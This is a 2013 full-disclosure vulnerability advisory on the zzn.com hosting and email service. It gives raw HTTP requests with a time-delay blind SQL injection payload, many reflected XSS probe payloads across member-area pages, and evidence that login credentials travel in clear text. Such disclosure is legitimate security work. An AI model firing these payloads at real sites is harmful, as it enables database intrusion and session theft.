ZZN (Web Hosting and Free email accounts) Blind SQLInjection / Cross Site Scripting /User credentials are sent in clear text/
==================================================================================================================================================


Report-Timeline:
================
2013-07-18:     Researcher Notification I 
2013-07-19:     Researcher Notificaction II
2013-07-20:     Researcher Notificaction III
2013-07-20:     Vendor Feedback
2013-07-22:     Ask About the Issues I / Not Response
2013-07-23:     Ask About the Issues II / Not Response
2013-07-26:     Not Response / Not Fixed
2013-08-02:     Not Response / Not Fixed
2013-08-09:     Full Disclosure


I-VULNERABILITIES
======================

#Title: ZZN (Web Hosting and Free emailaccounts) Blind SQLInjection / Cross Site Scripting /User credentials are sent in clear text/

#Vendor:http://www.zzn.com

#Author:Juan Carlos García (@secnight)

#Follow me 

 http://highsec.es
 http://hackingmadrid.blogspot.com
Twitter:@secnight


II-Introduction:
======================

ZZN is a web hosting e-mail service.ZZN mail lets you create your OWN Web site and customized email service.

Users can sign up and login to your email from www.your-name.zzn.com, or directly from your website.

    -Build a great FREE Website
    -Increase site stickiness by having users check their mail from your site.
    -Brand your email colors and logos to that of your site.
    -Choose from 14 interface languages.
    -Promote your site using the tagline attached to every outgoing message.
    -Keep in touch with your users using the mailing list feature.



III-PROOF OF CONCEPT
======================

BLIND SQL INJECTION
______________________________________

Blind SQLinjection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement 

and doesn't properly filter out dangerous characters. 

Attacks
-------


1-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' -- 

POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com

%2fmembersarea_en&SpamCopy=&SpamEmail=sample@email.tst&VirtIP=



2-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' -- 

POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Length: 280
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com

%2fmembersarea_en&SpamCopy=&SpamEmail=sample@email.tst&VirtIP=



Multiple CROSS SITE SCRIPTING
_______________________________

Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, 

it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application 

to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user. 


Affected items
/membersarea_en/alertwindow.asp 
/membersarea_en/copy%20of%20emailaccount.asp 
/membersarea_en/directemailerror.asp 
/membersarea_en/home.asp 
/membersarea_en/insidelogin.asp 
/membersarea_en/joinframes.asp 
/membersarea_en/loginerror.asp 
/membersarea_en/preminder.asp 
/membersarea_en/signup.asp 
/membersarea_en/support_abuse.asp 



Proof Of Concept 
----------------

These files have at least one input (GET or POST).


/membersarea_en/home.asp - 3 inputs

/membersarea_en/joinframes.asp - 2 inputs

/membersarea_en/emailaccount.asp - 4 inputs

/membersarea_en/preminder.asp - 1 inputs

/membersarea_en/signup.asp - 2 inputs

/membersarea_en/support.asp - 1 inputs

/membersarea_en/insidelogin.asp - 2 inputs

/membersarea_en/directemailerror.asp - 1 inputs

/membersarea_en/alertwindow.asp - 1 inputs

/membersarea_en/loginerror.asp - 1 inputs

/membersarea_en/support_abuse.asp - 1 inputs

/membersarea_en/copy%20of%20emailaccount.asp - 1 inputs

/membersarea_en/directregister.asp - 1 inputs

/zlog - 1 inputs

/zlog/blog_error.asp - 1 inputs



TOO MANY Cross Site Scripting

There are many more variants in both methods, I put these failures as an example .. but I repeat again, there are many more variants of these failures



Method GET
----------

http://www.zzn.com/membersarea_en/alertwindow.asp?message=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28903379%29%3c%2fScRiPt%3e 

http://www.zzn.com/membersarea_en/alertwindow.asp?message=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28903379%29%3c%2fScRiPt%3e 

http://www.zzn.com/membersarea_en/directemailerror.asp?message=915766%27%28%29920634

http://www.zzn.commembersarea_en/insidelogin.asp?fromPage=%22%20onmouseover%3dprompt%28908665%29%20bad%3d%22 

http://www.zzn.com/membersarea_en/joinframes.asp?main=join&type=%22%20onmouseover%3dprompt%28922666%29%20bad%3d%22

http://www.zzn.com/membersarea_en/loginerror.asp?message=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28958884%29%3c%2fScRiPt%3e 

http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=%22%20onmouseover%3dprompt%28910568%29%20bad%3d%22&LastName=&type=webmaster 

http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=%22%20onmouseover%3dprompt%28939138%29%20bad%3d%22&LastName=&type=website 

http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28927027%29%20bad%3d%22&type=webmaster 

http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28949012%29%20bad%3d%22&type=community 

http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28967610%29%20bad%3d%22&type=family

http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28960668%29%20bad%3d%22&type=website 

http://www.zzn.commembersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=&type=%22%20onmouseover%3dprompt%28942440%29%20bad%3d%22



Method POST
-----------

POST /membersarea_en/copy%20of%20emailaccount.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)


company=SECNIGHT&firstname=%22%20onmouseover%3dprompt%28968469%29%20bad%3d%22&Interface=0&lastname=secnight&LoginPage=1



POST /membersarea_en/copy%20of%20emailaccount.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)


company=secnight&firstname=%22%20onmouseover%3dprompt%28960576%29%20bad%3d%22&Interface=0&lastname=secnight&LoginPage=1



POST /membersarea_en/home.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)


DoLogin=True&image1=&LogFlag=1&SubDomain=999971%22%28%29997917&UserPassword=




POST /membersarea_en/insidelogin.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

DoLogin=True&FromFrames=True&FromWhere=false&image1=&origPage=20&SubDomain=986581%28%29996458&UserPassword=secnight



POST /membersarea_en/insidelogin.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)


DoLogin=True&FromFrames=True&FromWhere=false&image1=&origPage=20&SubDomain=986581%28%29996458&UserPassword=g00dPa$$w0rD




POST /membersarea_en/preminder.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)


NotFirstTime=true&rqHintSubDomain=%22%20onmouseover%3dprompt%28956443%29%20bad%3d%22





POST /membersarea_en/signup.asp?type= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)


confirm=&Country=__&DefaultLanguage=1&EMail=%22%20onmouseover%3dprompt%28927344%29%20bad%3d%22&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=555-666-0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$

$w0rD&SiteURL=http://highsec.esS&NOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102




POST /membersarea_en/signup.asp?type=website HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)


confirm=&Country=__&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=%22%20onmouseover%3dprompt%28961485%29%20bad%3d%22&Phone=555-666-
0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102




POST /membersarea_en/signup.asp?type= HTTP/1.1
Content-Length: 325
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

confirm=&Country=__&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=%22%20onmouseover%3dprompt%28948601%29%20bad%3d
%22&ReEMail=sample@email.tst&reUserPassword=g00dPa$$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102


POST /membersarea_en/signup.asp?type= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)


confirm=&Country=__&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=555-666-0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$

$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=%22%20onmouseover%3dprompt%28967492%29%20bad%3d%22&yob=0&zip=94102





POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)


beenThere=secnight&company=highsec&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com%2fmembersarea_en&SpamCopy=&SpamEmail=%22%20onmouseover

%3dprompt%28983845%29%20bad%3d%22&VirtIP=





USER CREDENTIALS ARE SENT IN CLEAR TEXT
_______________________________________

User credentials are not encrypted when they are transmitted.A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.Because user credentials usually are considered sensitive information, it 

is recommended to be sent to the server over an encrypted connection of course.


Affected items

/membersarea_en/home.asp (13310f83d103a349490b8582539e8e21) 
/membersarea_en/home.asp (4aaaffaf70dda99921aec4f1b2ceda9b) 
/membersarea_en/insidelogin.asp 
/membersarea_en/insidelogin.asp (4ea409a137fbaff8d5b639c5c42f16fb) 
/membersarea_en/insidelogin.asp (58b6536a2fd7f196e5ff147122d20d98) 
/membersarea_en/insidelogin.asp (67306227331ba5cbb21a0c2aebce7241) 
/membersarea_en/insidelogin.asp (b67529bf426329db238325c03ba3ac46) 
/membersarea_en/insidelogin.asp (b91e4b1df6bdc5d9e626034018953543) 
/membersarea_en/loginbox.asp 
/membersarea_en/signup.asp 
/membersarea_en/signup.asp (134f342931a2e21525c6aa2cc3172a10) 
/membersarea_en/signup.asp (6951aefa9721a0c5da3591ca525d49fe) 
/membersarea_en/signup.asp (6afc2b9654e79ff801823fbaf74a6984) 
/membersarea_en/signup.asp (80e7b7df44c32c456eb77aa274db4c08) 
/membersarea_en/signup.asp (9791cfb3ed5d1e88c7a13337e5afb6da) 
/membersarea_en/signup.asp (9b77eec0e71402d51f3f9b4bc0bd36f9) 
/membersarea_en/signup.asp (c18e6bf01d3e39b1b9bccf1a50909498) 
/membersarea_en/signup.asp (d087acb8154fc2e7ac71718a76ecf9b1) 
/membersarea_en/signup.asp (d3c9ccf4d5c2c129b6eaa3c685ad11ef) 
/membersarea_en/signup.asp (decad2f3bdc62c80a19d23c110dd40d4) 
/membersarea_en/signup.asp (f321b396abface84ca2dc3a5facb1bd4) 
/membersarea_en/signup.asp (f9583d9e844817a92b7f0743a7c9becf) 


Examples ( TOO MANY variants)


POST /membersarea_en/home.asp HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 8d3b79cd70a5d7b8b5b273ddce225c7a
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://www.ZZN.COM/membersarea_en/home.asp?from=g1&s=www.zzn.com
Content-Length: 55
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.ZZN.COM
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

DoLogin=True&image1=&LogFlag=1&SubDomain=&UserPassword=




GET /membersarea_en/insidelogin.asp?fromPage=homepagez.asp 



POST /membersarea_en/signup.asp?type= HTTP/1.1
Pragma: no-cache
Password: 8d3b79cd70a5d7b8b5b273ddce225c7a
filelist;aspectalerts
Referer: http://www.ZZN.COM/membersarea_en/signup.asp
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE
Host: www.ZZN.COM
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)


confirm=&Country=AF&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=555-666-0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$

$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102


IV. CREDITS
-------------------------

This vulnerabilities has been discovered
by Juan Carlos García(@secnight)


V. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.